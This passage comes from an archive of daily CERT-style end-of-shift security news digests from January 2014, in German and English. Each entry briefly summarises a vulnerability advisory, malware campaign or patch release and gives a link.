"undelivered courier item" attack *** --------------------------------------------- Our colleagues at SophosLabs pointed us at a interesting item of malware the other day, namely a data-stealing Trojan aimed at Mac users. In fact, it was somewhat more than that: it was one of those "undelivered courier item" emails linking to a dodgy web server that guessed whether you were running Windows or OS X, and targeted you accordingly. --------------------------------------------- http://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-ma… *** Cisco TelePresence System Software Command Execution Vulnerability *** --------------------------------------------- Cisco TelePresence System Software contains a vulnerability in the System Status Collection Daemon (SSCD) code that could allow an unauthenticated, adjacent attacker to execute arbitrary commands with the privileges of the root user. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco TelePresence Video Communication Server SIP Denial of Service Vulnerability *** --------------------------------------------- Cisco TelePresence Video Communication Server (VCS) contains a vulnerability that could allow an unauthenticated, remote attacker to trigger the failure of several critical processes which may cause active call to be dropped and prevent users from making new calls until the affected system is reloaded. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco TelePresence ISDN Gateway D-Channel Denial of Service Vulnerability *** --------------------------------------------- Cisco TelePresence ISDN Gateway contains a vulnerability that could allow an unauthenticated, remote attacker to trigger the drop of the data channel (D-channel), causing all calls to be terminated and preventing users from making new calls. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…

1 0

Tageszusammenfassung - Dienstag 21-01-2014
by Daily end-of-shift report 21 Jan '14

21 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 20-01-2014 18:00 − Dienstag 21-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** Sicherheitstest eingerichtet: BSI meldet millionenfachen Identitätsdiebstahl *** --------------------------------------------- Behörden haben bei der Analyse von Botnetzen rund 16 Millionen betroffene Benutzerkonten entdeckt. Das BSI bietet einen Sicherheitstest an, um E-Mails auf Identitätsdiebstahl zu überprüfen. (Internet, Security) --------------------------------------------- http://www.golem.de/news/sicherheitstest-eingerichtet-bsi-meldet-millionenf… *** Android Vulnerability Enables VPN Bypass *** --------------------------------------------- A hole in Androids VPN feature could expose what should be securely communicated data as clear, unencrypted text. --------------------------------------------- http://threatpost.com/android-vulnerability-enables-vpn-bypass/103719 *** Details on Patched Microsoft Office 365 XSS Vulnerability Disclosed *** --------------------------------------------- A cross-site scripting vulnerability in Microsoft Office 365 casts attention on the need to shore up the security of cloud-based enterprise applications. --------------------------------------------- http://threatpost.com/details-on-patched-microsoft-office-365-xss-vulnerabi… *** Kampf um die Hintertüren einer vernetzten Welt *** --------------------------------------------- Adam Philpott vom Netzwerk-Riesen Cisco bestreitet Kooperation mit Geheimdiensten und skizziert neue Bedrohungen im Netz der Zukunft --------------------------------------------- http://derstandard.at/1389857261752 *** Blog: WhatsApp for PC - a guaranteed Trojan banker *** --------------------------------------------- WhatsApp for PC - now from Brazil and bringing banker which will steal your money. It hides itself as an mp3 file and has a low VT detection. --------------------------------------------- http://www.securelist.com/en/blog/208214225/WhatsApp_for_PC_a_guaranteed_Tr… *** EU cyber security Agency ENISA calls for secure e-banking and e-payments: non-replicable, single-use credentials for e-identities are needed in the financial sector *** --------------------------------------------- Different tokens, devices, mobile phones, e-signatures, etc. are used to authenticate our e-identities. Yet, some financial institutions are still not considering the risk of inadequate authentication mechanisms according to a new study by the EU Agency ENISA. --------------------------------------------- http://www.enisa.europa.eu/media/press-releases/enisa-calls-for-secure-e-ba… *** Spoiled Onions *** --------------------------------------------- As of January 2014, the Tor anonymity network consists of 5,000 relays of which almost 1,000 are exit relays. As the diagram to the right illustrates, exit relays bridge the gap between the Tor network and the open Internet. As a result, exit relays are able to see anonymised network traffic as it is sent by Tor clients. While most exit relays are innocuous and run by well-meaning volunteers, there are exceptions: In the past, some exit relays were documented to have sniffed and --------------------------------------------- http://www.cs.kau.se/philwint/spoiled_onions/ *** Merkur-Kundendaten mit Nocard geknackt *** --------------------------------------------- Studenten der FH Salzburg ist mit dem Kundenkartengenerator Zugriff auf Kundenprofile gelungen --------------------------------------------- http://derstandard.at/1389857747260 *** WordPress WordFence Plugin "User-Agent" Script Insertion Vulnerability *** --------------------------------------------- Input passed via the "User-Agent" HTTP header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in a administrator's browser session in context of an affected site when the malicious data is being viewed. --------------------------------------------- https://secunia.com/advisories/56558

1 0

Tageszusammenfassung - Montag 20-01-2014
by Daily end-of-shift report 20 Jan '14

20 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 17-01-2014 18:00 − Montag 20-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** NCR: Weltweit 95 Prozent aller Geldautomaten mit Windows XP *** --------------------------------------------- Laut einem hochrangigen Manager des Herstellers NCR laufen fast alle Geldautomaten weltweit noch mit Windows XP. Die Deutsche Kreditwirtschaft will davon nichts wissen, und erklärt, dass die Geldautomaten in Deutschland nicht am Internet hängen. Daher spiele die Art des Betriebssystems keine Rolle. --------------------------------------------- http://www.golem.de/news/ncr-weltweit-95-prozent-aller-geldautomaten-mit-wi… *** Adware vendors buy Chrome Extensions to send ad- and malware-filled updates *** --------------------------------------------- A first-hand account of this, which was first spotted by OMGChrome, was given by Amit Agarwal, developer of the "Add to Feedly" extension. One morning, Agarwal got an e-mail offering "4 figures" for the sale of his Chrome extension. The extension was only about an hours worth of work, so Agarwal agreed to the deal, the money was sent over PayPal, and he transferred ownership of the extension to another Google account.. --------------------------------------------- http://arstechnica.com/security/2014/01/malware-vendors-buy-chrome-extensio… *** VPN Related Vulnerability Discovered on an Android device - Disclosure Report *** --------------------------------------------- As part of our ongoing mobile security research we have uncovered a network vulnerability on Android devices which has serious implications for users using VPN. This vulnerability enables malicious apps to bypass active VPN configuration (no ROOT permissions required) and redirect secure data communications to a different network address. These communications are captured in CLEAR TEXT (no encryption), leaving the information completely exposed. This redirection can take place while leaving the --------------------------------------------- http://cyber.bgu.ac.il/blog/vpn-related-vulnerability-discovered-android-de… *** Looking Forward Into 2014: What 2013′s Mobile Threats Mean Moving Forward *** --------------------------------------------- 2013 was the year that the Android malware not just grew, but matured into a full-fledged threat landscape. Not only did the number of threats grow, the sophistication and capabilities associated with these threats grew as well. As we noted earlier, the number of mobile malware threats has crossed the one million mark, and as of ... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/mF1EIjR8duU/ *** Open-Xchange Server Multiple Vulnerabilities *** --------------------------------------------- Multiple vulnerabilities have been reported in Open-Xchange, which can be exploited by malicious users to disclose potentially sensitive information and by malicious people to conduct cross-site scripting and script insertion attacks. --------------------------------------------- https://secunia.com/advisories/56390 *** F5 ARX Series Cyrus SASL NULL Pointer Dereference Vulnerability *** --------------------------------------------- F5 has acknowledged a vulnerability in F5 ARX Series, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a bundled vulnerable version of Cyrus SASL in relation to the ARX Manager Configuration utility. --------------------------------------------- http://secunia.com/advisories/56077/ *** Moodle Security Bypass Security Issue and Cross-Site Request Forgery Vulnerability *** --------------------------------------------- A security issue and a vulnerability have been reported in Moodle, which can be exploited by malicious users to bypass certain security restrictions and by malicious people to conduct cross-site request forgery attacks. --------------------------------------------- https://secunia.com/advisories/56556

1 0

Tageszusammenfassung - Freitag 17-01-2014
by Daily end-of-shift report 17 Jan '14

17 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 16-01-2014 18:00 − Freitag 17-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** JS-Binding-Over-HTTP Vulnerability and JavaScript Sidedoor: Security Risks Affecting Billions of Android App Downloads *** --------------------------------------------- Third-party libraries, especially ad libraries, are widely used in Android apps. Unfortunately, many of them have security and privacy issues. In this blog, we summarize our findings related to the insecure usage of JavaScript binding in ad libraries. --------------------------------------------- http://www.fireeye.com/blog/technical/2014/01/js-binding-over-http-vulnerab… *** ECAVA INTEGRAXOR BUFFER OVERFLOW VULNERABILITY *** --------------------------------------------- Overview: This advisory is a follow-up to the alert titled ICS-ALERT-14-015-01 Ecava IntegraXor Buffer Overflow Vulnerability that was published January 15, 2014, on the NCCIC/ICS-CERT Web site. Independent researcher Luigi Auriemma identified a buffer overflow vulnerability in the Ecava IntegraXor application without coordination with NCCIC/ICS-CERT, the vendor, or any other coordinating entity known to NCCIC/ICS-CERT. Ecava has produced a patch version that mitigates this vulnerability. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-016-01 *** A Closer Look at the Target Malware, Part II *** --------------------------------------------- Yesterdays story about the point-of-sale malware used in the Target attack has prompted a flood of reporting from antivirus and security vendors. Buried within those reports are some interesting details that speak to possible actors involved and to the timing and discovery of this breach. --------------------------------------------- http://feedproxy.google.com/~r/KrebsOnSecurity/~3/V1LusjgMQk8/ *** HPSBUX02961 SSRT101420 rev.1 - HP-UX Running BIND, Remote Denial of Service (DoS) *** --------------------------------------------- A potential security vulnerability has been identified with HP-UX running BIND. This vulnerability could be exploited remotely to create a Denial of Service (DoS). --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** Thingbot: Botnetz infiziert Kühlschrank *** --------------------------------------------- Ein US-Sicherheitsunternehmen hat ein Botnetz enttarnt. Das Besondere daran ist, dass etwa ein Viertel der infizierten Geräte keine Computer sind, sondern andere Internet-fähige Geräte - darunter ein Kühlschrank. (Spam, Malware) --------------------------------------------- http://www.golem.de/news/thingbot-botnetz-infiziert-kuehlschrank-1401-10397… *** Microsoft löscht Tor-Software nach Trojaner-Befall *** --------------------------------------------- Von mehreren hunderttausend Windows-PCs hat Microsoft veraltete Tor-Software gelöscht, die ein Trojaner installiert hatte. Auf bis zu zwei Millionen Rechnern soll der heimlich eingerichtete Dienst immer noch aktiv sein. --------------------------------------------- http://www.heise.de/security/meldung/Microsoft-loescht-Tor-Software-nach-Tr… *** Oldboot: the first bootkit on Android *** --------------------------------------------- A few days ago, we found an Android Trojan using brand new method to modify devices boot partition and booting script file to launch system service and extract malicious application during the early stage of systems booting. Due to the special RAM disk feature of Android devices boot partition, all current mobile antivirus product in the world can't completely remove this Trojan or effectively repair the system. We named this Android Trojan family as Oldboot. As far as we --------------------------------------------- http://blogs.360.cn/360mobile/2014/01/17/oldboot-the-first-bootkit-on-andro…

1 0

Tageszusammenfassung - Donnerstag 16-01-2014
by Daily end-of-shift report 16 Jan '14

16 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 15-01-2014 18:00 − Donnerstag 16-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** Compromised Sites Pull Fake Flash Player From SkyDrive *** --------------------------------------------- On most days, our WorldMap shows more of the same thing. Today is an exception.One infection is topping so high in the charts that it pretty much captured our attention.Checking the recent history of this threat, we saw that these past few days, it has been increasing in infection hits.So we dug deeper It wasnt long before we saw that a lot of scripts hosted in various websites got compromised. Our telemetry actually showed that almost 40% of the infected websites were hosted in Germany. In --------------------------------------------- http://www.f-secure.com/weblog/archives/00002659.html *** Microsoft antimalware support for Windows XP *** --------------------------------------------- Microsoft has announced the Windows XP end of support date of April 8, 2014. After this date, Windows XP will no longer be a supported operating system. To help organizations complete their migrations, Microsoft will continue to provide updates to our antimalware signatures and engine for Windows XP users through July 14, 2015. This does not affect the end-of-support date of Windows XP, or the supportability of Windows XP for other Microsoft products, which deliver and apply those signatures. --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2014/01/15/microsoft-antimalware-su… *** SA-CORE-2014-001 - Drupal core - Multiple vulnerabilities *** --------------------------------------------- Advisory ID: DRUPAL-SA-CORE-2014-001Project: Drupal coreVersion: 6.x, 7.xDate: 2014-January-15Security risk: Highly criticalExploitable from: RemoteVulnerability: Multiple vulnerabilitiesDescriptionMultiple vulnerabilities were fixed in the supported Drupal core versions 6 and 7.Impersonation (OpenID module - Drupal 6 and 7 - Highly critical)A vulnerability was found in the OpenID module that allows a malicious user to log in as other users on the site, including administrators, and hijack --------------------------------------------- https://drupal.org/SA-CORE-2014-001 *** A First Look at the Target Intrusion, Malware *** --------------------------------------------- Last weekend, Target finally disclosed at least one cause of the massive data breach that exposed personal and financial information on more than 110 million customers: Malicious software that infected point-of-sale systems at Target checkout counters. Todays post includes new information about the malware apparently used in the attack, according to two sources with knowledge of the matter. --------------------------------------------- http://feedproxy.google.com/~r/KrebsOnSecurity/~3/OVODHvnhoQs/ *** Amazons public cloud fingered as USs biggest MALWARE LAIR *** --------------------------------------------- Cyber-crooks lurve Bezos & Cos servers and their whitelisted IP addresses Amazons public cloud is the largest haven of malware spreaders in the US, according to security company Solutionary.… --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/01/16/amazon_clou… *** Ecava IntegraXor Buffer Overflow Vulnerability *** --------------------------------------------- NCCIC/ICS-CERT is aware of a public report of a buffer overflow vulnerability with proof-of-concept (PoC) exploit code affecting Ecava IntegraXor, a supervisory control and data acquisition/human-machine interface (SCADA/HMI) product. According to this report, the vulnerability is exploitable by using a command to load an arbitrary resource from an arbitrary DLL located in the program’s main folder. --------------------------------------------- http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-015-01 *** Advisory (ICSA-13-344-01) WellinTech Multiple Vulnerabilities *** --------------------------------------------- NCCIC/ICS-CERT received reports from the Zero Day Initiative (ZDI) regarding a remote code execution vulnerability and an information disclosure vulnerability in WellinTech KingSCADA, KingAlarm&Event, and KingGraphic applications. These vulnerabilities were reported to ZDI by security researcher Andrea Micalizzi. WellinTech has produced a new version that mitigates these vulnerabilities. These vulnerabilities could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01 *** Google verstärkt Anti-Spam-Team mit Zukauf *** --------------------------------------------- Das Team des Startups Impermium, das ein System gegen E-Mail-Account-Missbrauch entwickelt, wechselt zum Internet-Giganten. --------------------------------------------- http://www.heise.de/security/meldung/Google-verstaerkt-Anti-Spam-Team-mit-Z… *** Telekom reagiert mit Blog-Eintrag auf gefälschte Rechnungen *** --------------------------------------------- Erneut versenden Kriminelle gefälschte Online-Rechnungen der Telekom als Lockmittel, um Schadsoftware zu verbreiten. Dieses Mal reagiert der Konzern mit Warn-Mails und einem Blog-Eintrag, der Unterscheidungsmerkmale zu echten Rechnungen erklärt. --------------------------------------------- http://www.heise.de/security/meldung/Telekom-reagiert-mit-Blog-Eintrag-auf-… *** The Hidden Backdoors to the City of Cron *** --------------------------------------------- An attackers key to creating a profitable malware campaign is its persistency. Malicious code that is easily detected and removed will not generate enough value for their creators. This is the reason why we are seeing more and more malware using creative backdoor techniques, different obfuscation methods, and using unique approaches to increase the lifespanRead More --------------------------------------------- http://feedproxy.google.com/~r/sucuri/blog/~3/MCeUaRyYi88/the-hidden-backdo… *** DynDNS-Dienst knickt unter DDoS-Attacke ein *** --------------------------------------------- Dyn, Betreiber eines der bekanntesten DynDNS-Dienstes, ist Ziel eines DDoS-Angriffs geworden. Es ist zwar nur ein Teil der DNS-Infrastruktur des Anbieters betroffen, aber die Störung schlägt dennoch bis zu den Nutzern durch. --------------------------------------------- http://www.heise.de/newsticker/meldung/DynDNS-Dienst-knickt-unter-DDoS-Atta… *** Niederländische Behörden warnen vor Webcams *** --------------------------------------------- Die niederländischen Justizbehörden warnen, dass die in Tablets und Latops eingebauten Webcams eine Sicherheitslücke darstellen, über die Hacker eindringen können. Abkleben wird empfohlen. --------------------------------------------- http://www.heise.de/security/meldung/Niederlaendische-Behoerden-warnen-vor-…

1 0

Tageszusammenfassung - Mittwoch 15-01-2014
by Daily end-of-shift report 15 Jan '14

15 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 14-01-2014 18:00 − Mittwoch 15-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Verfassungsschutz: Gefahr der Online-Wirtschaftsspionage noch immer unterschätzt *** --------------------------------------------- Viele kleine und mittelständische Unternehmen sähen Ausgaben für IT-Sicherheit immer noch nicht als gut investiertes Geld an, meinte der Präsident des Bundesamts für Verfassungsschutz. --------------------------------------------- http://www.heise.de/security/meldung/Verfassungsschutz-Gefahr-der-Online-Wi… *** NSA zapft auch Computer ohne Internetverbindung an *** --------------------------------------------- Die NSA hat weltweit auf rund 100.000 Computern Spionagesoftware installiert. Auch zu Computern ohne Internetverbindung hat sich der US-Geheimdienst Zutritt verschafft. --------------------------------------------- http://futurezone.at/netzpolitik/nsa-zapft-auch-computer-ohne-internetverbi… *** A Look Into the Future and the January 2014 Bulletin Release *** --------------------------------------------- In January, there are those who like to make predictions about the upcoming year. I am not one of those people. Instead, I like to quote Niels Bohr who said, "Prediction is very difficult, especially if it's about the future." However, I can say without a doubt that change is afoot in 2014. In February, usage of the MD5 hash algorithm in certificates will be restricted, as first discussed in Security Advisory 2862973, and the update goes out through Microsoft Update on the... --------------------------------------------- http://blogs.technet.com/b/msrc/archive/2014/01/14/a-look-into-the-future-a… *** Kritische und wichtige Patches von Adobe und Microsoft *** --------------------------------------------- Was lange währt wird endlich gut: Microsoft hat an seinem Patchday unter anderem die Rechteausweitungslücke in Windows geschlossen, die mindestens seit November für Angriffe missbraucht wird. Von Adobe gibt es dringende Updates für Acrobat und Reader. --------------------------------------------- http://www.heise.de/security/meldung/Kritische-und-wichtige-Patches-von-Ado… *** Oracle schließt 144 Sicherheitslücken *** --------------------------------------------- Update betrifft auch Java 7 und Java 5 --------------------------------------------- http://derstandard.at/1388651059299 *** Adobe Security Bulletins Posted *** --------------------------------------------- Today, we released the following Security Bulletins: APSB14-01 – Security updates available for Adobe Reader and Acrobat APSB14-02 – Security updates available for Adobe Flash Player Customers of the affected products should consult the relevant Security Bulletin(s) for details. --------------------------------------------- http://blogs.adobe.com/psirt/?p=1041 *** Oracle Critical Patch Update Advisory - January 2014 *** --------------------------------------------- Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible. This Critical Patch Update contains 144 new security fixes across the product families listed below. --------------------------------------------- http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html *** Summary for January 2014 - Version: 1.0 *** --------------------------------------------- This bulletin summary lists security bulletins released for January 2014. With the release of the security bulletins for January 2014, this bulletin summary replaces the bulletin advance notification originally issued January 9, 2014. For more information about the bulletin advance notification service, see Microsoft Security Bulletin Advance Notification. --------------------------------------------- http://technet.microsoft.com/en-ca/security/bulletin/ms14-jan

1 0

Tageszusammenfassung - Dienstag 14-01-2014
by Daily end-of-shift report 14 Jan '14

14 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 13-01-2014 18:00 − Dienstag 14-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** HPSBUX02960 SSRT101419 rev.1 - HP-UX Running NTP, Remote Denial of Service (DoS) *** --------------------------------------------- A potential security vulnerability has been identified with HP-UX running NTP. The vulnerability could be exploited remotely to create a Denial of Service (DoS). --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** Security: Mathematische Formel für den Cyberwar *** --------------------------------------------- Zwei Wissenschaftler aus den USA haben eine Formel entwickelt, mit sie ausrechnen können, wann der beste Zeitpunkt ist, um einen Cyberangriff auf ein bestimmtes Ziel mit bestimmten Mitteln durchzuführen. (Cyberwar, Security) --------------------------------------------- http://www.golem.de/news/security-mathematische-formel-fuer-den-cyberwar-14… *** Router-Backdoor: Cisco, Netgear und Linksys versprechen Schutz *** --------------------------------------------- Erst Ende Januar will Cisco ein Update liefern, das die in einigen Geraten gefundene Hintertür beseitigt; Netgear und Linksys nennen noch keinen Termin. Support-Anfragen zeigen, dass die Hintertür seit mindestens 10 Jahren aktiv ist. --------------------------------------------- http://www.heise.de/security/meldung/Router-Backdoor-Cisco-Netgear-und-Link… *** Spamming and scanning botnets - is there something I can do to block them from my site?, (Tue, Jan 14th) *** --------------------------------------------- Spamming and scanning botnets - is there something I can do to block them from my site? This question keeps popping up on forums and all places popular with those beleaguer souls despondent of the random spamming and over filled logs from scanning. Although this isnt a Magic ball question answer does come out a: Maybe, Maybe not. The reason behind the ambiguity is logical, to a degree; it's easy trying to hinder, frustrate and reduce the effectiveness of automated botnet processes, --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17426&rss *** ISC BIND NSEC3-Signed Zones Queries Handling Denial of Service Vulnerability *** --------------------------------------------- A vulnerability has been reported in ISC BIND, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error when handling queries for NSEC3-signed zones and can be exploited to cause a crash with an "INSIST" failure by sending a specially crafted query. Successful exploitation requires an authoritative nameservers serving at least one NSEC3-signed zone. --------------------------------------------- https://secunia.com/advisories/56427

1 0

Tageszusammenfassung - Montag 13-01-2014
by Daily end-of-shift report 13 Jan '14

13 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 10-01-2014 18:00 − Montag 13-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** Factsheet published: Certificates with 1024 bit RSA are being phased-out *** --------------------------------------------- Does your organisation still use certificates with an RSA key-length of at most 1024 bits? The NCSC recommends to replace them. The factsheet Certificates with 1024 bit RSA are being phased-out provides you with more information and perspectives for action. --------------------------------------------- https://www.ncsc.nl/english/current-topics/news/factsheet-published-certifi… *** Symantec Endpoint Protection multiple vulnerabilities *** --------------------------------------------- Symantec Endpoint Protection authentication privilege escalation http://xforce.iss.net/xforce/xfdb/90224 Symantec Endpoint Protection search paths privilege escalation http://xforce.iss.net/xforce/xfdb/90226 Symantec Endpoint Protection custom polocies security bypass http://xforce.iss.net/xforce/xfdb/90225 *** Juniper Junos multiple vulnerabilities *** --------------------------------------------- Juniper Junos CLI Commands Let Local Users Gain Elevated Privileges http://www.securitytracker.com/id/1029585 Juniper Junos Branch SRX Series HTTP Processing Flaw Lets Remote Users Deny Service http://www.securitytracker.com/id/1029584 Juniper Junos Branch SRX Series IP Processing Flaw Lets Remote Users Deny Service http://www.securitytracker.com/id/1029583 Juniper Junos BGP Update Processing Flaw Lets Remote Users Deny Service http://www.securitytracker.com/id/1029582 Juniper Junos XNM Command Processor Lets Remote Users Consume Excessive Memory on the Target System http://www.securitytracker.com/id/1029586 *** Die tausend gestopften Löcher des FFmpeg *** --------------------------------------------- Zwei Google-Ingenieure haben vor zwei Jahren damit begonnen, automatisiert nach Fehlern in dem freien Multimedia-Framework FFmpeg zu fahnden, von denen inzwischen über 1120 behoben wurden. --------------------------------------------- http://www.heise.de/security/meldung/Die-tausend-gestopften-Loecher-des-FFm… *** Microsoft Twitter accounts, blog hijacked by SEA *** --------------------------------------------- Another week, ANOTHER security own goal for Redmond Microsoft had two Twitter accounts and an official blog compromised over the weekend in another embarrassing security incident for the Redmond giant. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/01/13/microsoft_t… *** Trends in Targeted Attacks: 2013 *** --------------------------------------------- FireEye has been busy over the last year. We have tracked malware-based espionage campaigns and published research papers on numerous advanced threat actors. We chopped through Poison Ivy, documented a cyber arms dealer, and revealed that Operation Ke3chang had targeted --------------------------------------------- http://www.fireeye.com/blog/technical/malware-research/2014/01/trends-in-ta… *** Cisco bestätigt Hintertür in mehreren Routern *** --------------------------------------------- Test-Interface erlaubt Zugriff auf sensible Daten - Update soll noch im Jänner folgen --------------------------------------------- http://derstandard.at/1388650811096 *** Bericht: Britischer Geheimdienst GCHQ schwächte GSM-Verschlüsselung *** --------------------------------------------- Bislang wurde kolportiert, die NATO habe in den 1980er-Jahren auf einem schwachen A5/1-Algorithmus bestanden. Nun weist ein norwegischer Wissenschaftler den Briten die Verantwortung dafür zu. --------------------------------------------- http://www.heise.de/security/meldung/Bericht-Britischer-Geheimdienst-GCHQ-s… *** Versorgung mit Virensignaturen für Windows-XP-Rechner vorerst gesichert *** --------------------------------------------- Am 8. April lässt Microsoft den Support für Windows XP fallen, doch die Antiviren-Hersteller beeindruckt das nicht. Die Folge: Um Signatur-Updates muss sich der XP-Anwender vorerst keine Sorgen machen, solange der Virenwächter nicht von Microsoft kommt. --------------------------------------------- http://www.heise.de/security/meldung/Versorgung-mit-Virensignaturen-fuer-Wi… *** LKA NRW warnt vor Betrugsversuchen angeblicher Microsoft-Mitarbeiter *** --------------------------------------------- In den vergangenen Wochen haben sich Fälle gehäuft, in denen angebliche Mitarbeiter des Microsoft-Supports versuchen, PC-Nutzer per Telefon zu schädigen. --------------------------------------------- http://www.heise.de/security/meldung/LKA-NRW-warnt-vor-Betrugsversuchen-ang…

1 0

Tageszusammenfassung - Freitag 10-01-2014
by Daily end-of-shift report 10 Jan '14

10 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 09-01-2014 18:00 − Freitag 10-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Understanding and mitigating NTP-based DDoS attacks *** --------------------------------------------- Over the last couple of weeks you may have been hearing about a new tool in the DDoS arsenal: NTP-based attacks. These have become popular recently and caused trouble for some gaming web sites and service providers. Wed long thought that NTP might become a vector for DDoS attacks because, like DNS, it is a simple UDP-based protocol that can be persuaded to return a large reply to a small request. Unfortunately, that prediction has come true. --------------------------------------------- http://blog.cloudflare.com/understanding-and-mitigating-ntp-based-ddos-atta… *** Advance Notification for January 2014 - Version: 1.0 *** --------------------------------------------- This is an advance notification of security bulletins that Microsoft is intending to release on January 14, 2014. This bulletin advance notification will be replaced with the January bulletin summary on January 14, 2014. For more information about the bulletin advance notification service, see... --------------------------------------------- http://technet.microsoft.com/en-us/security/bulletin/ms14-jan *** Oracle Critical Patch Update Pre-Release Announcement - January 2014 *** --------------------------------------------- This Critical Patch Update Pre-Release Announcement provides advance information about the Oracle Critical Patch Update for January 2014, which will be released on Tuesday, January 14, 2014. While this Pre-Release Announcement is as accurate as possible at the time of publication, the information it contains may change before publication of the Critical Patch Update Advisory. --------------------------------------------- http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html *** Prenotification Security Advisory for Adobe Reader and Acrobat *** --------------------------------------------- Adobe is planning to release security updates on Tuesday, January 14, 2014 for Adobe Reader and Acrobat XI (11.0.05) and earlier versions for Windows and Macintosh. --------------------------------------------- http://helpx.adobe.com/security/products/reader/apsb14-01.html *** Adobe, Microsoft und Oracle zelebrieren ersten Patchday des Jahres *** --------------------------------------------- Kommenden Dienstag ist es wieder soweit. Adobe will kritische Lücken in Acrobat und Adobe Reader schließen, Microsoft unter anderem eine Windows-Lücke, die bereits seit November vergangenen Jahres ausgenutzt wird. --------------------------------------------- http://www.heise.de/security/meldung/Adobe-Microsoft-und-Oracle-zelebrieren… *** Tackling the Sefnit botnet Tor hazard *** --------------------------------------------- Sefnit, a prevailing malware known for using infected computers for click fraud and bitcoin mining, has left millions of machines potentially vulnerable to future attacks. We recently blogged about Sefnit performing click fraud and how we added detection on the upstream Sefnit installer. In this blog we explain how the Tor client service, added by Sefnit, is posing a risk to millions of machines, and how we are working to address the problem. Win32/Sefnit made headlines last August as it took... --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2014/01/09/tackling-the-sefnit-botn… *** Schon wieder hunderttausende Kundendaten durch xt:Commerce-Lücke geklaut *** --------------------------------------------- Eine weitere Sicherheitslücke in xt:Commerce 3 und einigen der Nachfolger wird derzeit ausgenutzt, um die Namen, Mail-Adressen und Passwort-Hashes in Online-Shops zu entwenden. Betroffen sind über 230.000 Kunden vor allem aus Deutschland und Österreich. --------------------------------------------- http://www.heise.de/security/meldung/Schon-wieder-hunderttausende-Kundendat… *** Cisco Context Directory Agent Multiple Vulnerabilities *** --------------------------------------------- Multiple vulnerabilities have been reported in Cisco Context Directory Agent, which can be exploited by malicious users to bypass certain security restrictions and by malicious people to conduct cross-site scripting attacks and manipulate certain data. --------------------------------------------- https://secunia.com/advisories/56365

1 0

Tageszusammenfassung - Donnerstag 9-01-2014
by Daily end-of-shift report 09 Jan '14

09 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 08-01-2014 18:00 − Donnerstag 09-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Intercepted Email Attempts to Steal Payments, (Wed, Jan 8th) *** --------------------------------------------- A reader sent in details of a incident that is currently being investigated in their environment. (Thank you Peter for sharing! ) It appears to be a slick yet elaborate scam to divert a customer payment to the scammers. It occurs when the scammer attempts to slip into an email conversation and go undetected in order to channel an ordinary payment for service or goods into his own coffers. Here is a simple breakdown of the flow: Supplier sends business email to customer, email mentions a... --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17366&rss *** ZeroAccess Takedown and the TDSS Aftermath *** --------------------------------------------- Early December last year, Microsoft - in cooperation with certain law enforcement agencies - announced their takedown of the ZeroAccess operations. This development, however, also yielded an unexpected effect on another well-known botnet, in particular TDSS. TDSS and ZeroAccess ZeroAccess is one of the most notable botnets in the world, with its malware known for rootkit... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/v07x5pzmpj4/ *** Malvertising attacks via Yahoo ads may precede broader iframe attacks *** --------------------------------------------- A New Years malvertisement attack on Yahoo.com that is believed to have infected the systems and devices of thousands of website visitors could signal an uptick in the use of highly effective iframe Web attacks on larger online communities. --------------------------------------------- http://searchsecurity.techtarget.com/news/2240212218/Malvertising-attacks-v… *** Personal banking apps leak info through phone *** --------------------------------------------- For several years I have been reading about flaws in home banking apps, but I was skeptical. To be honest, when I started this research I was not expecting to find any significant results. --------------------------------------------- http://blog.ioactive.com/2014/01/personal-banking-apps-leak-info-through.ht… *** Falscher Alarm: Avast für Android hält alle Apps für Viren *** --------------------------------------------- Ein fehlerhaftes Signaturupdate hat dazu geführt, dass Avast Android-Virenscanner am heutigen Donnerstag zahlreich fündig wurde. --------------------------------------------- 